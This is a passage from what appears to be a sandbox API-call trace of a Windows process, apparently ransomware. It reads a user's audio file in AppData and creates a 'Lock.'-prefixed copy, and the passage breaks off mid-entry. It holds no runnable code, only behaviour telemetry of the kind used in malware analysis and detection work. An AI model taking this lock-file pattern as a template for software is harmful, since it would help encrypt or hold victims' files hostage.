[0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0196.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0196.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.165] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.165] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.165] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.165] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0196.166] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/CoTbYkKe.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cotbykke.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0196.166] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.166] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0196.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0196.166] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.166] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.176] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.CoTbYkKe.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.cotbykke.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0196.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0196.177] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0196.177] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.177] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0196.177] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0196.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0196.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.177] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0196.178] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x1f6a, lpOverlapped=0x0) returned 1 [0196.208] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0196.208] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1f6a) returned 0x34a2048 [0196.208] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.208] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0196.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.209] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0196.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0196.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1f6a) returned 0x34a2048 [0196.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1f6a) returned 0x34a5f38 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0196.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0196.211] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0196.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.211] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0196.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.212] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.212] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0196.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0196.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0196.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0196.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.214] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0196.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.215] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0196.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0196.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0196.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.215] RtlAllocateHeap 